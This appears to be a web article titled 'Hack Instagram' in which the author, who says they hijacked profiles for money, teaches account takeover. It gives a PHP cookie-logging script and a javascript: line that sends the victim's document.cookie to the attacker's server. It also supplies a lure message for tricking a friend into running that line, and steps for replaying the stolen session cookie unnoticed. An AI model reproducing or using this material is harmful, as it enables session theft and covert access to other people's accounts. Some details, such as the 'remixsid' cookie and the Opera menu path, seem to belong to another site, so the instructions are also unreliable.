Hack Instagram

Hack Instagram

The history of Instagram dates back to sunny San Francisco, on October 6, 2010, the application became available for download. Today, Instagram has gained millions of users, and even back in 2013, 16 million photos were already uploaded.

In connection with such a scale, many users have a need to hack this social. net. The reasons may be different, each has its own. For me personally, it was a very good way to make money. I was breaking Instagram profiles in 17-18. Now I do not deal with such trifles, but the method, in theory, should still work. In this article, I will tell you about the most effective way to hack this social network.

So, we will need an FTP server. You need to create a folder on it, call it "next".

Select this folder and press the chmod button, checkboxes will appear, put on everything and press save. Inside the folder, create an index.php file

Next, open and write a sniffer:


// getting data from the link

$cookie = $ _SERVER ['REQUEST_URI'];

//ip address

$ip = $ _SERVER ['REMOTE_ADDR'];

// Create file

$file = fopen ("snif.dat", "a +");

//calculating the current time

$time = date ("H: i: M: d");

// add cookies + time + ip to the string variable

$add_text = "$ ip $ time $ cookie";

//Write data to file

fputs ($ file, $ add_text. ", \ r \ n");

// close the file

fclose ($ file);

// so as to not to be suspected, we transfer the user back to the Instagram

header ('Location: https: //www.instagram.com');


The sniffer is ready. We should get a link like this:

http: //your_domain.ru/next/index.php

Next, open any text editor (for example, notepad) and write:

javascript:window.location.href = "http: //your_domain.ru/next/index.php? cookie =" + document.cookie; 

And throws it off to our friend. For example, we write to him:

"If you put this in the address bar, then it will snow on your page or all your photos on the page will have 10,000 likes!"

Here the approach to everyone is different, you need to use a little social engineering.

If he runs this script in the address bar, then it will immediately be transferred to the Instagram start page. No snow, of course, will go there for him, but on the server, we will have a date file with his cookies.

Next, we need to replace the stolen cookies.

The easiest way:

Open the Opera browser> Settings> General settings> Advanced> Cookies Opera Cookies.

You only need to change the value of the remixsid cookie parameter.

We refresh the page and immediately enter another account, without any username and password. At the same time, our friend will not know that we have entered his page. Choose the methods of anonymity yourself. That is all stuff.

Successful hacks!

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